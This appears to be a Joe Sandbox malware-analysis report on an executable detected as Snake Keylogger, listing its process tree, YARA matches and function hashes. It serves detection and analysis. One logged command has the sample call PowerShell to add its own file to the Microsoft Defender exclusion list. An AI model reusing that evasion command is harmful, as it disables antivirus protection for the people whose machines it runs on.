Commandline:	"C:\Users\user\Desktop\.05.2024.exe"
Imagebase:	0x120000
File size:	526'336 bytes
MD5 hash:	D3720192678D263171733EF9BA7FA67C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:52:05
Start date:	27/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\.05.2024.exe"
Imagebase:	0xa60000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:52:05
Start date:	27/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:52:05
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\.05.2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\.05.2024.exe"
Imagebase:	0x490000
File size:	526'336 bytes
MD5 hash:	D3720192678D263171733EF9BA7FA67C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3748481710.000000000278C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.3748481710.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	06:52:10
Start date:	27/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	33
Total number of Limit Nodes:	1

Executed Functions

Function 007DB240 Relevance: 1.7, APIs: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 007DB4A6

Memory Dump Source

Source File: 00000004.00000002.1305364611.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7d0000_UNK_.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e5dde980505103acaf0ecd66173a5317c7acf380fe9c3874ab9e124a4712a95e
Instruction ID: 5428d289da02debb19df691db750caf4bf35395c61d927689c745abaa723edc0
Opcode Fuzzy Hash: e5dde980505103acaf0ecd66173a5317c7acf380fe9c3874ab9e124a4712a95e
Instruction Fuzzy Hash: B6810170A00B05DFD724DF6AD44579ABBF1FB88314F00892ED48ADBB50DB78A9468B91

Function 007D5CFC Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 007D5DB9

Memory Dump Source

Source File: 00000004.00000002.1305364611.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7d0000_UNK_.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 67e3828a400150fe7d66ffd14a9553845ed577bc59c9a858ad9d3ca107f73f06
Instruction ID: b6bbccd9d027ae1e8728103225f192e806d707fb0896b59563fbe666f1c03097
Opcode Fuzzy Hash: 67e3828a400150fe7d66ffd14a9553845ed577bc59c9a858ad9d3ca107f73f06
Instruction Fuzzy Hash: A341E3B1C01719CBEB24DFA9C8847CEBBB6BF48704F20856AD408AB355DB756946CF90

Function 007D4854 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 007D5DB9

Memory Dump Source

Source File: 00000004.00000002.1305364611.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7d0000_UNK_.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a114bdf5a74298c4994003d0831439f44bb77ca41f0ae9b9cd2770b477298d1c
Instruction ID: 91bfd24fbc329bf72e655eacff48f2f6e00a0d56e8f18ebfa2bf9336ffa4717e
Opcode Fuzzy Hash: a114bdf5a74298c4994003d0831439f44bb77ca41f0ae9b9cd2770b477298d1c
Instruction Fuzzy Hash: 8C41D271D0071DCBEB24DFA9C844B9EBBF6BF48304F20816AD508AB255DB756946CFA0

Function 007DD720 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,007DD6EE,?,?,?,?,?), ref: 007DD7AF

Memory Dump Source

Source File: 00000004.00000002.1305364611.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7d0000_UNK_.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e9eba76c06e89940ea1bec2e330771bdb66bb465cd993011034f8b02704f8a0c
Instruction ID: 5d3aff114f36699396c8a5f704644e701adfeae4bed19fa0be08d880ecee178c
Opcode Fuzzy Hash: e9eba76c06e89940ea1bec2e330771bdb66bb465cd993011034f8b02704f8a0c
Instruction Fuzzy Hash: F72105B5C002499FDB10CFAAD485ADEBFF4FB48320F10805AE914A7350D3789941CF60

Function 007DCFF8 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,007DD6EE,?,?,?,?,?), ref: 007DD7AF

Memory Dump Source

Source File: 00000004.00000002.1305364611.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7d0000_UNK_.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9b95bea7ef7f1373f50038a46f7108fdb6fddb4b96bdb377672599b995235dac
Instruction ID: 597d9767d4c00fd869ffb3da800cf39548177f3e9e16a69c4cc03ded10f481f4
Opcode Fuzzy Hash: 9b95bea7ef7f1373f50038a46f7108fdb6fddb4b96bdb377672599b995235dac
Instruction Fuzzy Hash: C421E3B5D003499FDB20CF9AD884ADEBBF4EB48320F14806AE914A3350D379A954CFA5

Function 007DB440 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 007DB4A6

Memory Dump Source

Source File: 00000004.00000002.1305364611.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7d0000_UNK_.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 440f699b41d0cde4b657d5e14362138753473028aca9390787ca5df25a8a4354
Instruction ID: f1366ef53718469150c05812ad56d0c09b0c6d4976ea8aeebbfb27fe1c2d6271
Opcode Fuzzy Hash: 440f699b41d0cde4b657d5e14362138753473028aca9390787ca5df25a8a4354
Instruction Fuzzy Hash: 7B1102B6C00249CFCB10DF9AD444A9EFBF4EB88324F11842AD518A7211C379A945CFA5

Function 0076D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1305120199.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_76d000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977b7b817daad5e1ca6274232e9feefda0406e95c63095b52f71a3afeeff4f30
Instruction ID: 388ada344c01198d4b5c2607703d23bb0d539c3cca38625510175858caaaffd4
Opcode Fuzzy Hash: 977b7b817daad5e1ca6274232e9feefda0406e95c63095b52f71a3afeeff4f30
Instruction Fuzzy Hash: 8A21F471A14240DFDB25DF14D9C0B26BF65FB98318F24C569EC070A657C33ADC66CAA2

Function 0077D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1305196074.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77d000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f3a3aef21a162662ddb4bb03ce2f75eac391e09d1c07cac497d130aa7e42fe
Instruction ID: bd38bb684adf17bd5b8c2302471a130df2a7e85e4f288aa72d3f9eaeb072bb79
Opcode Fuzzy Hash: d3f3a3aef21a162662ddb4bb03ce2f75eac391e09d1c07cac497d130aa7e42fe
Instruction Fuzzy Hash: EA21CF756042049FDF24DF14D984B26BB75EB88314F24C569D84E4B286C33ADC47CA62

Function 0076D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1305120199.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_76d000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction ID: 23273658dcc1e860a6e5770c64e5f20ef2d14531834895f23090d76445028dfb
Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
Instruction Fuzzy Hash: 60119D76A04280CFCB15CF14D5C4B16BF62FB94324F2486A9DC4A0B656C33AD866CBA1

Function 0077D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1305196074.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_77d000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction ID: 87b2eb8cd334e64c3fa3424eba174538091f35574f937ae1ebd02f0e493d5077
Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
Instruction Fuzzy Hash: 4F118E75504284DFCB15CF14D5C4B15BB72FB44314F24C6A9D84D4B656C33AD85ACB61

Non-executed Functions

Function 007DE084 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1305364611.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a92064d439cdecf8469c21bda340c16877bd303813093a29be79f0212766dc9
Instruction ID: 6b3ea70f7a82a65ac713e684c9ad7116626d3b9417166438a6f51102eb6386a5
Opcode Fuzzy Hash: 6a92064d439cdecf8469c21bda340c16877bd303813093a29be79f0212766dc9
Instruction Fuzzy Hash: 07A13A36A00219CFCF15DFB5C84499EBBB2FF85300B25857AE806AB365DB79E915CB40

Analysis Process: .05.2024.exePID: 1424, Parent PID: 4296COMMON

Execution Graph

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20%
Total number of Nodes:	100
Total number of Limit Nodes:	10

Executed Functions

Function 064D99A8 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8bdde99e6ba62a433641949a33394872543dc011f358d9b7be7c758e2bfa851
Instruction ID: 6ac33edf4bae201ca486473a256cc263b304bf85617b16795bb641a404b1bae1
Opcode Fuzzy Hash: b8bdde99e6ba62a433641949a33394872543dc011f358d9b7be7c758e2bfa851
Instruction Fuzzy Hash: 13F1F374E00218CFDB54DFA9C994B9DFBB2BF88304F1481AAD808AB395DB759985CF50

Function 064DCE20 Relevance: 1.6, APIs: 1, Instructions: 100
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 064DCE71

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4aa9e1206afd482eff1c49bcf12edea04141755f7fb46449721e821c9e48797
Instruction ID: 74db646fcb8b02ab799cd6143da06332021bb269da920e1a11b8755b1b0c40b7
Opcode Fuzzy Hash: b4aa9e1206afd482eff1c49bcf12edea04141755f7fb46449721e821c9e48797
Instruction Fuzzy Hash: EF4109B0D002089FDB14CF99D5D4ADEFBF6BF88314F24816AD4056B395C731A986CB90

Function 064C3008 Relevance: .7, Instructions: 745
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ee7445cc57422a06d7f39fcc909df273be67a6d6db7b5e4fab8f8b3c932f53
Instruction ID: cb20a4c8a7a7ca466ecf2666eceb4605fbba71bf8b3af56101d5b156fefacd2a
Opcode Fuzzy Hash: f4ee7445cc57422a06d7f39fcc909df273be67a6d6db7b5e4fab8f8b3c932f53
Instruction Fuzzy Hash: DA828E74E012288FDBA5DF69C994BDDBBB2BB88301F1081EA940DA7365DB315E81DF41

Function 064D0B30 Relevance: .7, Instructions: 709
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc7527d7a5f5a81e99582010bdf1dbc7fe9514b616bc5d5463a20dfa07a7acaf
Instruction ID: e82357c334d03940ef1b650dd877df1a60f71a159b9b5bd577d73cd5aeecc8a0
Opcode Fuzzy Hash: bc7527d7a5f5a81e99582010bdf1dbc7fe9514b616bc5d5463a20dfa07a7acaf
Instruction Fuzzy Hash: FB72CF74E012288FDB65DF69C994BDEBBB2BB49300F1481EAD809A7355DB349E81CF50

Function 064C9770 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e61c5d397f29a551bc3379a3a925dd19742ed393300d554b20f26508d211afc
Instruction ID: f16762115958d261705bdcab97b691f47bebda026e4cf7760f156428d6b122d9
Opcode Fuzzy Hash: 7e61c5d397f29a551bc3379a3a925dd19742ed393300d554b20f26508d211afc
Instruction Fuzzy Hash: 0DE1D274E01218CFEB64DFA5D894B9DBBB2BF89300F2081AAD409B7395DB355A85CF14

Function 064DE6B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6879bb34c27d5e6684e39e2c0016c8e1f98682fac9e76fdf4cbff5b9780f9d9
Instruction ID: 8b1cc47c8c86a2000678b70190672be9838f14d208c67e0761ef66c38b6d5ac1
Opcode Fuzzy Hash: c6879bb34c27d5e6684e39e2c0016c8e1f98682fac9e76fdf4cbff5b9780f9d9
Instruction Fuzzy Hash: 50C1D274E00218CFDB54DFA5D994B9DBBB2BF89300F2081AAD409AB395DB359E81CF50

Function 064D1848 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d388d8d1c689618e7ee4199fd73453bb3208fe33f20ce8b16257ac2248622ee
Instruction ID: f76b091e9a226c4c841a1d84dafea2f0d84b0df651551f6464419397e13ec7f0
Opcode Fuzzy Hash: 0d388d8d1c689618e7ee4199fd73453bb3208fe33f20ce8b16257ac2248622ee
Instruction Fuzzy Hash: 54C1C374E01218CFDB54DFA5D994B9DBBB2BF89301F2080AAD809AB354DB359E85CF50

Function 064D29C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2dc3fdbfd2fb6bf9693612c282bda283eab89477279cff9f515759e58e39a8
Instruction ID: bd12940c84dfb4e0a863272f2c2df49718470398514bf37f6c4062c17cb228be
Opcode Fuzzy Hash: 8e2dc3fdbfd2fb6bf9693612c282bda283eab89477279cff9f515759e58e39a8
Instruction Fuzzy Hash: 19C1D274E00218CFDB54DFA5C994B9DBBB2BF89301F2080AAD909AB354DB759E85CF50

Function 064D31F7 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd4d994cedc80062a68de62c9d01393f82bb0963ad08ba4eb91411f7260c15a
Instruction ID: 5c2866265a4c8d756e375d7c23f49a1b177a350c7403bfa3d2f5b9153871673a
Opcode Fuzzy Hash: afd4d994cedc80062a68de62c9d01393f82bb0963ad08ba4eb91411f7260c15a
Instruction Fuzzy Hash: EFA11770D002088FEB15DFA8C994BDDBBB1BF49304F24826AE409AB391DB759985CF55

Function 064D3228 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3311d16b0c41a638b2a42b491a2c48ddd860b73cf77497f7f7e76927fc082e
Instruction ID: bc4826dfa669e4da1694500a4d5827f7d7563a816d263d83417663d13febe373
Opcode Fuzzy Hash: 7e3311d16b0c41a638b2a42b491a2c48ddd860b73cf77497f7f7e76927fc082e
Instruction Fuzzy Hash: C1A1F570D00208CFEB25DFA9C954BDDBBB1BF89304F20826AE409AB391DB759985CF55

Function 064CCA70 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d03d59c6c2c5d10dfcc2402562a6874ef3db555a536efdaae7a19fdb616908
Instruction ID: ac6b9280782f37eb3b1f69621c26219355ac515aaf54ed7dd3d1bc86f1f61bdf
Opcode Fuzzy Hash: 28d03d59c6c2c5d10dfcc2402562a6874ef3db555a536efdaae7a19fdb616908
Instruction Fuzzy Hash: 71A19374E012188FEB68CF6AC944B9EBBF2AF89310F14C0AAD40DA7354D7745A85CF50

Function 064CC420 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 064e029d7b13a9a67d043accef3de8fef00350111cd77b0bc23a7ea657df97ed
Instruction ID: ffb7e9f301e266c3b7f9b7ec7b905e8c6bb05aceb05e33fb17594766976ad9ae
Opcode Fuzzy Hash: 064e029d7b13a9a67d043accef3de8fef00350111cd77b0bc23a7ea657df97ed
Instruction Fuzzy Hash: 4CA1A375E012188FEB64CF6AC984B9EBBF2AF89300F14D0AAD40CA7354DB345A85CF50

Function 064CD0C0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494150c3e06f0963013a6b0ba87be2093c4d9ddbe9fb63f8f7ad60b81f5c7a2c
Instruction ID: bf7c11e3ac60f33b6435e7b4e0eafe82a335e3a5fe792b49a02f428bcc47a485
Opcode Fuzzy Hash: 494150c3e06f0963013a6b0ba87be2093c4d9ddbe9fb63f8f7ad60b81f5c7a2c
Instruction Fuzzy Hash: 29A19275E012188FEB68CF6AD944B9EBBF2AF89310F14C0AAD40CA7355DB345A85CF50

Function 064CB140 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 307afad2aac39d155d970a16fcd21d43272aac419fb13e9509320842f2c9f99c
Instruction ID: c8ea08c88332fcd3e246a94b4927574aa5527c8a9237496812d72fb61dd096de
Opcode Fuzzy Hash: 307afad2aac39d155d970a16fcd21d43272aac419fb13e9509320842f2c9f99c
Instruction Fuzzy Hash: 27A1A274E012288FEB68CF6AC945B9DBBF2BF89310F14C0AAD409A7355DB345A85CF50

Function 064CD710 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfaa057da1e3e6352a1e1d5a8e843e022c1615a92fdda1a636b3a2091d3db342
Instruction ID: 36e47b1a8bd3511381cc8561763c534bf6ef11bfe680aedf5c15fddad04ecd2e
Opcode Fuzzy Hash: bfaa057da1e3e6352a1e1d5a8e843e022c1615a92fdda1a636b3a2091d3db342
Instruction Fuzzy Hash: 2AA19174E01218CFEB68CF6AD944B9EBBF2AF89310F14C0AAD408A7355DB745A85CF50

Function 064CE3A8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c642ff15ba6d5d9dc609f8777d328c0176ab1ec0d382d21bc4c38e2c88fb47
Instruction ID: 9f7b6c0b84b0b6a5d47d4c0a5d42e924e36a3b97d193866aa59426de9c97c374
Opcode Fuzzy Hash: c3c642ff15ba6d5d9dc609f8777d328c0176ab1ec0d382d21bc4c38e2c88fb47
Instruction Fuzzy Hash: BAA1A275E01228CFEB68CF6AC944B9DBBF2AF89310F14C0AAD408A7355DB345A85CF50

Function 064CDD60 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d535e6205369b0876927eac2d7c8e92a703c1ea5f2260f17379c2ef19594f7e3
Instruction ID: 361741108ae577855d5c55d8f6ce92cd55e4754d407c7712ae0fad35bab5e51e
Opcode Fuzzy Hash: d535e6205369b0876927eac2d7c8e92a703c1ea5f2260f17379c2ef19594f7e3
Instruction Fuzzy Hash: B6A18175E012288FEB68DF6AC944B9DBBF2AF89310F14C0AAD409A7254DB345A85CF51

Function 064CBDD8 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4486d1d73c56ef72303ee4c6117a27160b66adcca5e923b0c5b4976c5d188f34
Instruction ID: aae849eecd3015fa6529def1d6188a53200f393994b840c483946b20ba1d0375
Opcode Fuzzy Hash: 4486d1d73c56ef72303ee4c6117a27160b66adcca5e923b0c5b4976c5d188f34
Instruction Fuzzy Hash: 1AA19375E012188FEB64CF6AD945B9DBBF2AF89310F14C0AAD40CA7354DB345A85CF54

Function 064CB790 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754087775.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64c0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a2d0a76f178ff34f0304fade1bbea7d6a62e293d623bc28ed18e975fdb991b6
Instruction ID: 48b7d7ded56f2ba14513bcf696ded6f80b01c9d82d8d13aa042a1d333d482944
Opcode Fuzzy Hash: 0a2d0a76f178ff34f0304fade1bbea7d6a62e293d623bc28ed18e975fdb991b6
Instruction Fuzzy Hash: 16A19375E01228CFEB64CF6AC945B9EBBF2AF89310F14C0AAD448A7354DB345A85CF50

Function 064D356E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3754133370.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_64d0000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
